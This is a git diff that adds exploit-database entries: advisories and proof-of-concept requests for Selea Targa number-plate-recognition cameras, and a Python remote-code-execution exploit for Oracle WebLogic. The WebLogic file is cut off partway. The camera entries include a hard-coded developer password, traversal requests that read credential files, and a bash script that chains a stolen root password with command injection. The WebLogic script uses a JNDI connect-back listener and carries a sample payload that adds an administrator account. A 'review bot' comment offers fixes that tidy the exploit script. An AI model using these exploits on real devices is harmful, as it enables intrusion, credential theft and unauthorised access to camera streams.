diff --git a/exploits/hardware/webapps/49454.txt b/exploits/hardware/webapps/49454.txt
new file mode 100644
index 000000000..ecb1ee0f4
--- /dev/null
+++ b/exploits/hardware/webapps/49454.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera Remote Stored XSS
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: The application suffers from a stored XSS through a POST request. The issue is
+triggered when input passed to the 'files_list' parameter is not properly sanitized
+before being returned to the user. This can be exploited to execute arbitrary HTML
+and script code in a user's browser session in context of an affected site.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5614
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5614.php
+
+
+07.11.2020
+
+--
+
+
+Remote Stored XSS:
+------------------
+
+POST /cgi-bin/get_file.php HTTP/1.1
+Host: 192.168.1.17
+
+name=Test&files_list=
+
+
+Unauthenticated Log Pollution Trigger XSS:
+------------------------------------------
+
+GET /get_log.php?type=system HTTP/1.1
+Host: 192.168.1.17
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49455.txt b/exploits/hardware/webapps/49455.txt
new file mode 100644
index 000000000..fb72d511f
--- /dev/null
+++ b/exploits/hardware/webapps/49455.txt
@@ -0,0 +1,122 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that
+enables the vendor to enable configuration upload / overwrite to the affected device
+using the checkManufacturer() function through an AJAX method.
+
+======================================================================================
+/dev.html:
+----------
+...
+...
+ function checkManufacturer(){
+ var manufacturer=$.cookie('manufacturer');
+ if (manufacturer){ $('#set_manufacturer').val('Disable manufacturer'); $('#dev_page').show(); $('#config_restore').show(); }
+ else{ $('#set_manufacturer').val('Enable manufacturer'); $('#dev_page').hide(); $('#config_restore').hide();}
+ }
+ checkManufacturer();
+ function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)};
+ $('#set_manufacturer').click(function(){
+ var manufacturer=$.cookie('manufacturer');
+ if (manufacturer){ $.cookie('manufacturer',null); location.reload(); }
+ else{
+ $.ajax({
+ url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()),
+ timeout: 2000,
+ cache:false,
+ mimeType: 'text/plain'
+ }).done(function(result){
+ try{
+ var info=$.parseJSON(result);
+ if (info.auth=="OK"){
+ setManufacturerTimeout();
+ location.reload();
+...
+...
+
+/cgi-bin/utils.php:
+-------------------
+...
+...
+$cmd=$_GET["cmd"];
+
+if ($cmd=="DEVPASS"){
+ $pwd=$_GET["pwd"];
+
+ $info=new StdClass();
+ $info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR";
+
+ print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT));
+ exit();
+}
+...
+...
+
+======================================================================================
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5615
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php
+
+
+07.11.2020
+
+--
+
+
+$ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b
+{ "auth": "OK" }
+
+OR
+
+Navigate to /dev.html and enter password: Selea781830, enable config upload.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49456.txt b/exploits/hardware/webapps/49456.txt
new file mode 100644
index 000000000..730fdd4d5
--- /dev/null
+++ b/exploits/hardware/webapps/49456.txt
@@ -0,0 +1,117 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability.
+Input passed through the Download Archive in Storage page using get_file.php script is
+not properly verified before being used to download files. This can be exploited to
+disclose the contents of arbitrary and sensitive files via directory traversal attacks
+and aid the attacker to disclose clear-text credentials resulting in authentication
+bypass.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5616
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php
+
+
+07.11.2020
+
+--
+
+
+$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json
+{
+ "viewers": {},
+ "root_pwd": "P@$$w0rd",
+ "operators": {}
+}
+
+$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+root:x:0:0:root:/root:/bin/sh
+daemon:x:1:1:daemon:/usr/sbin:/bin/false
+bin:x:2:2:bin:/bin:/bin/false
+sys:x:3:3:sys:/dev:/bin/false
+sync:x:4:100:sync:/bin:/bin/sync
+mail:x:8:8:mail:/var/spool/mail:/bin/false
+www-data:x:33:33:www-data:/var/www:/bin/false
+operator:x:37:37:Operator:/var:/bin/false
+nobody:x:99:99:nobody:/home:/bin/false
+dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
+
+
+
+POST /cgi-bin/get_file.php HTTP/1.1
+Host: 192.168.1.17
+
+name=TESTINGUS&files_list=/etc/passwd
+
+
+HTTP/1.1 200 OK
+Content-Type: application/octet-stream
+Content-disposition: attachment; filename="TESTINGUS.tar"
+Expires: 0
+Cache-Control: must-revalidate
+Pragma: public
+Content-Length: 2048
+Connection: close
+Date: Wed, 09 Dec 2020 01:39:57 GMT
+Server: selea_httpd
+
+root:/root:/bin/sh
+daemon:x:1:1:daemon:/usr/sbin:/bin/false
+bin:x:2:2:bin:/bin:/bin/false
+sys:x:3:3:sys:/dev:/bin/false
+sync:x:4:100:sync:/bin:/bin/sync
+mail:x:8:8:mail:/var/spool/mail:/bin/false
+www-data:x:33:33:www-data:/var/www:/bin/false
+operator:x:37:37:Operator:/var:/bin/false
+nobody:x:99:99:nobody:/home:/bin/false
+dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49457.txt b/exploits/hardware/webapps/49457.txt
new file mode 100644
index 000000000..656c3f5f6
--- /dev/null
+++ b/exploits/hardware/webapps/49457.txt
@@ -0,0 +1,111 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
+Selea ANPR camera within several functionalities. The application parses user supplied
+data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image
+request or check DNS for IP notification. Since no validation is carried out on the
+parameters, an attacker can specify an external domain and force the application to
+make an HTTP request to an arbitrary destination host. This can be used by an external
+attacker for example to bypass firewalls and initiate a service and network enumeration
+on the internal network through the affected application.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5617
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php
+
+
+07.11.2020
+
+--
+
+
+Request:
+--------
+
+POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
+Host: 192.168.1.17
+
+{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}
+
+
+Response (port 80):
+-------------------
+
+{"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19}
+
+
+Response (port 8080):
+---------------------
+
+{"code": 500,"error": "Error sending notification: Connection refused"}
+
+
+Request:
+--------
+
+POST /cps/test_url HTTP/1.1
+Host: 192.168.1.17
+
+{"url":"http://127.0.0.1:80"}:
+
+
+Response (port 80):
+-------------------
+
+{"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"}
+
+
+Response (port 8081):
+---------------------
+
+{"elapsed_ms": 1,"error": "Connection refused"}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49458.html b/exploits/hardware/webapps/49458.html
new file mode 100644
index 000000000..d14e2aa46
--- /dev/null
+++ b/exploits/hardware/webapps/49458.html
@@ -0,0 +1,117 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: The application interface allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests. This can be exploited to
+perform certain actions with administrative privileges if a logged-in user visits a malicious
+web site.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5618
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php
+
+
+07.11.2020
+
+--
+
+
+Add Admin:
+----------
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49459.txt b/exploits/hardware/webapps/49459.txt
new file mode 100644
index 000000000..ac1ce4bf7
--- /dev/null
+++ b/exploits/hardware/webapps/49459.txt
@@ -0,0 +1,67 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream
+disclosure when p1.mjpg or p1.264 is called.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5619
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
+
+
+07.11.2020
+
+--
+
+
+Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264
+Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49460.sh b/exploits/hardware/webapps/49460.sh
new file mode 100755
index 000000000..1b47cd59c
--- /dev/null
+++ b/exploits/hardware/webapps/49460.sh
@@ -0,0 +1,109 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+#!/bin/bash
+#
+# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
+#
+#
+# Vendor: Selea s.r.l.
+# Product web page: https://www.selea.com
+# Affected version: Model: iZero
+# Targa 512
+# Targa 504
+# Targa Semplice
+# Targa 704 TKM
+# Targa 805
+# Targa 710 INOX
+# Targa 750
+# Targa 704 ILB
+# Firmware: BLD201113005214
+# BLD201106163745
+# BLD200304170901
+# BLD200304170514
+# BLD200303143345
+# BLD191118145435
+# BLD191021180140
+# BLD191021180140
+# CPS: 4.013(201105)
+# 3.100(200225)
+# 3.005(191206)
+# 3.005(191112)
+#
+# Summary: IP camera with optical character recognition (OCR) software for automatic
+# number plate recognition (ANPR) also equipped with ADR system that enables it to read
+# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+# this camera suitable for all installation conditions. Its built-in OCR software works
+# as an automatic and independent system without the need of a computer, thus giving
+# autonomy to the device even in the event of an interruption in the connection between
+# the camera and the operations centre.
+#
+# Desc: Selea suffers from an authenticated command injection vulnerability. This can be
+# exploited to inject and execute arbitrary shell commands as the www-data user through
+# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated
+# LFI issue an attacker can grab credentials, authenticate and execute system commands.
+#
+# =====================================================================================
+# /mnt/app/scripts/address_check.sh:
+# ----------------------------------
+#
+# 01: #!/bin/sh
+# 02: . /mnt/app/scripts/env.sh
+# 03: . /mnt/app/scripts/log.sh
+# 04:
+# 05: CMD="$1"
+# 06: ADDR="$2"
+# 07: PORT="$3"
+# 08:
+# 09: if [ "$CMD" == "ping" ]; then
+# 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
+# 11: elif [ "$CMD" == "port" ]; then
+# 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
+# 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
+# 14: fi
+# 15:
+# 16: echo -e "$RESULT"
+#
+# =====================================================================================
+#
+# Tested on: GNU/Linux 3.10.53 (armv7l)
+# PHP/5.6.22
+# selea_httpd
+# HttpServer/0.1
+# SeleaCPSHttpServer/1.1
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2021-5620
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
+#
+#
+# 07.11.2020
+#
+#
+
+
+# PoC chained exploit (as admin):
+#
+# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
+# Password found: testingus
+# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
+# Using command: id
+# uid=33(www-data) gid=33(www-data) groups=33(www-data)
+#
+#
+IP=$1
+CMD=$2
+PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
+echo 'Password found: '${PWD}
+AUTH=$(echo admin:${PWD} | base64)
+echo 'Using Authorization: '${AUTH}
+echo 'Using command: '${CMD}
+curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'
\ No newline at end of file
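Review bot: The assignment `PWD=`curl ... `` at the top of the script body overwrites the shell's own `PWD` variable, which bash maintains as the current working directory; nothing later depends on it here, but it is a trap for anyone extending the script and makes `pwd`/prompt behaviour inconsistent, so rename it, e.g. `ROOT_PWD=$(curl -s ... | grep -oP 'root_pwd": "\K.*?(?=",)')` and `AUTH=$(echo admin:${ROOT_PWD} | base64)`. Note also that `#!/bin/bash` sits on the sixth line after the prepended header comments, so it is inert and the script runs under whichever shell invokes it; `$(...)` and `grep -oP` then depend on that shell and on a PCRE-enabled grep, and `$1`/`$2` are used without checking that both arguments were supplied. The quoted address_check.sh passes `"$ADDR"` and `"$PORT"` quoted, so the injection point appears to be where utils.php builds the command line before invoking this script; that is where the fix (escapeshellarg on the parameters, or an allow-list for addr/port) belongs, though utils.php itself is not shown in the hunk.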
diff --git a/exploits/java/webapps/49461.py b/exploits/java/webapps/49461.py
new file mode 100755
index 000000000..10c955f84
--- /dev/null
+++ b/exploits/java/webapps/49461.py
@@ -0,0 +1,203 @@
+# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
+# Date: 2021-01-21
+# Exploit Author: Photubias
+# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
+# Vendor Homepage: https://www.oracle.com
+# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
+# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
+# CVE: CVE-2021-2109
+
+#!/usr/bin/env python3
+'''
+ Copyright 2021 Photubias(c)
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+ File name CVE-2021-2109.py
+ written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
+
+ This is a native implementation without requirements, written in Python 3.
+ Works equally well on Windows as Linux (as MacOS, probably ;-)
+
+ Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
+ from https://github.com/welk1n/JNDI-Injection-Exploit
+ to be in the same folder
+'''
+import urllib.request, urllib.parse, http.cookiejar, ssl
+import sys, os, optparse, subprocess, threading, time
+
+## Static vars; change at will, but recommend leaving as is
+sURL = 'http://192.168.0.100:7001'
+iTimeout = 5
+oRun = None
+
+## Ignore unsigned certs, if any because WebLogic is default HTTP
+ssl._create_default_https_context = ssl._create_unverified_context
+
+class runJar(threading.Thread):
+ def __init__(self, sJarFile, sCMD, sAddress):
+ self.stdout = []
+ self.stderr = ''
+ self.cmd = sCMD
+ self.addr = sAddress
+ self.jarfile = sJarFile
+ self.proc = None
+ threading.Thread.__init__(self)
+
+ def run(self):
+ self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
+ for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
+ for line in iter(self.proc.stderr.readline, ''): self.stderr += line
+
+
+def findJNDI():
+ sCurDir = os.getcwd()
+ sFile = ''
+ for file in os.listdir(sCurDir):
+ if 'JNDI' in file and '.jar' in file:
+ sFile = file
+ print('[+] Found and using ' + sFile)
+ return sFile
+
+def findJAVA(bVerbose):
+ try:
+ oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
+ except:
+ exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.')
+ sResult = list(oProc.stdout)[0].decode()
+ if bVerbose: print('[+] Found Java: ' + sResult)
+
+def checkParams(options, args):
+ if args: sHost = args[0]
+ else:
+ sHost = input('[?] Please enter the URL ['+sURL+'] : ')
+ if sHost == '': sHost = sURL
+ if sHost[-1:] == '/': sHost = sHost[:-1]
+ if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
+ if options.username: sUser = options.username
+ else:
+ sUser = input('[?] Username [weblogic] : ')
+ if sUser == '': sUser = 'weblogic'
+ if options.password: sPass = options.password
+ else:
+ sPass = input('[?] Password [Passw0rd-] : ')
+ if sPass == '': sPass = 'Passw0rd-'
+ if options.command: sCMD = options.command
+ else:
+ sCMD = input('[?] Command to run [calc] : ')
+ if sCMD == '': sCMD = 'calc'
+ if options.listenaddr: sLHOST = options.listenaddr
+ else:
+ sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
+ if sLHOST == '': sLHOST = '192.168.0.10'
+ if options.verbose: bVerbose = True
+ else: bVerbose = False
+ return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)
+
+def startListener(sJarFile, sCMD, sAddress, bVerbose):
+ global oRun
+ oRun = runJar(sJarFile, sCMD, sAddress)
+ oRun.start()
+ print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
+ oRun.join(3)
+ if not oRun.stderr == '':
+ exit('[-] Error starting Java listener:\n' + oRun.stderr)
+ bThisLine=False
+ if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
+ for line in oRun.stdout:
+ if bThisLine: return line.split('/')[3].replace('\n','')
+ if 'JDK 1.8' in line: bThisLine = True
+
+def endIt():
+ global oRun
+ print('[+] Closing threads')
+ if oRun: oRun.proc.terminate()
+ exit(0)
+
+def main():
+ usage = (
+ 'usage: %prog [options] URL \n'
+ ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
+ ' in the current working folder\n'
+ 'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
+ 'Only works when hacker is reachable via an IPv4 address\n'
+ 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
+ 'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
+ 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
+ )
+
+ parser = optparse.OptionParser(usage=usage)
+ parser.add_option('--username', '-u', dest='username')
+ parser.add_option('--password', '-p', dest='password')
+ parser.add_option('--command', '-c', dest='command')
+ parser.add_option('--listen', '-l', dest='listenaddr')
+ parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)
+
+ ## Get or ask for the vars
+ (options, args) = parser.parse_args()
+ (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)
+
+ ## Verify Java and JAR file
+ sJarFile = findJNDI()
+ findJAVA(bVerbose)
+
+ ## Keep track of cookies between requests
+ cj = http.cookiejar.CookieJar()
+ oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
+
+ print('[+] Verifying reachability')
+ ## Get the cookie
+ oRequest = urllib.request.Request(url = sHost + '/console/')
+ oResponse = oOpener.open(oRequest, timeout = iTimeout)
+ for c in cj:
+ if c.name == 'ADMINCONSOLESESSION':
+ if bVerbose: print('[+] Got cookie "' + c.value + '"')
+
+ ## Logging in
+ lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
+ lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
+ oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
+ oResponse = oOpener.open(oRequest, timeout = iTimeout)
